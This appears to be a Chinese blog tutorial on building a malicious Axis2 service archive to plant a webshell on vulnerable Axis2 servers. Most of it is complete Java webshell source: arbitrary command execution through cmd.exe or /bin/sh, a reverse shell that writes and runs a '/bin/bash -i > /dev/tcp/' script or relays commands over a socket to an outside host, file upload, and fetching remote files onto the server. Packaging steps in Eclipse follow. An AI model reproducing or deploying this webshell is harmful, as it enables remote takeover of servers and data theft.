重新编译axis2获取webshell

前两天朋友在工作的时候发现一个好玩的东西,axis2的一个解析漏洞,在利用的时候为发现公开的exp无法使用,分析了原因是发现版本问题无法使用,需要重新打包为arr包,所以要我重新写了一下。

准备工作:

下载并安装eclipse中用于打包arr的插件

下载地址:http://archive.apache.org/dist/axis/axis2/java/core/

找到对应的版本号,下载对应的service插件,我下载的是下面这个

axis2-eclipse-service-plugin-1.7.6.zip

下载完成之后解压,提取其中的jar包,放入eclipse目录下的dropins中,这个过程要保证eclipse是关闭的状态。将插件放入dropins之后就可以打开eclipse了

编写利用代码

新建一个Java project

新建一个class

写入webshell的代码

代码如下:

import java.io.BufferedReader;
import java.io.File;
import java.io.FileOutputStream;
import java.io.FileWriter;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.Socket;
import java.net.URL;
import java.net.URLConnection;

public class Utils {

static String os = System.getProperty(“os.name”).toLowerCase();

public static String exec(String cmd) {
String result=””;
try {
if (cmd!=null&&cmd.trim().length()>0) {
if (os.startsWith(“windows”)) {
cmd=”cmd.exe /c “+ cmd;
}else {
cmd=”/bin/sh -c “+ cmd;
}
InputStream inputStream= Runtime.getRuntime().exec(cmd).getInputStream();

int read=0;
while ((read=inputStream.read())!=-1) {
result+=(char)read;
}
}
} catch (Exception e) {
result=e.getMessage();
}
return result;
}

public static String shell(String host, int port) {

String result = “”;
if (host != null && host.trim().length() > 0 && port > 0) {
try {
if (os.startsWith(“linux”)) {

String name=”wooyun.sh”;
File file=new File(name);

FileWriter writer=new FileWriter(file);
writer.write(“/bin/bash -i > /dev/tcp/”+host+”/”+port+” 0<&1 2>&1″+”\n”);
writer.flush();
writer.close();
Runtime.getRuntime().exec(“chmod u+x “+name);
Process process = Runtime.getRuntime().exec(“bash “+name);
process.waitFor();

file.delete();
} else {
Socket socket = new Socket(host, port);
OutputStream out = socket.getOutputStream();
InputStream in = socket.getInputStream();
out.write((“whoami:\t” + exec(“whoami”)).getBytes());
int a = 0;
byte[] b = new byte[4096];
while ((a = in.read(b)) != -1) {
out.write(exec(new String(b, 0, a, “UTF-8”).trim()).getBytes(“UTF-8”));
}
}
} catch (Exception e) {
result = e.getMessage();
}

} else {
result = “host and port are required”;
}

return result;
}

public static String upload(String path) {
String result=””;
try {
if (path!=null&&path.trim().length()>0) {
FileOutputStream fos=new FileOutputStream(new File(path));
InputStream inputStream =new Utils().getClass().getResourceAsStream(“/resource/one.txt”);
BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
String temp = “”;
while (reader.ready()) {
temp += reader.readLine() + “\n”;
}
fos.write(temp.getBytes());
fos.flush();
fos.close();
result=”Upload Success”;
}else {
result=”Path is required”;
}
} catch (Exception e) {
result =e.getMessage();
}
return result;
}

public static String download(String url, String path) {
String result=””;
try {

if (url!=null&&url.trim().length()>0&&path!=null&&path.trim().length()>0) {
URLConnection conn=new URL(url).openConnection();
conn.setReadTimeout(10*60*1000);
conn.setReadTimeout(10*60*1000);
InputStream inputStream=conn.getInputStream();
int read=0;
FileOutputStream fos=new FileOutputStream(new File(path));
while ((read=inputStream.read())!=-1) {
fos.write(read);
}
fos.flush();
fos.close();
}else {
result=”Url and path are required”;
}
} catch (Exception e) {
result =e.getMessage();
}
return result;
}

public static String getClassPath() {
return new Utils().getClass().getClassLoader().getResource(“/”).getPath();
}

}

保存并编译,会在bin目录下生成编译好的class文件

然后点击左上角,file—> new —> other —> Axis2 Wizards

选择刚刚导入的插件 Axis2 Service Archiver

输入class文件的完整路径

然后一路next就ok了

 

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注

17 − 11 =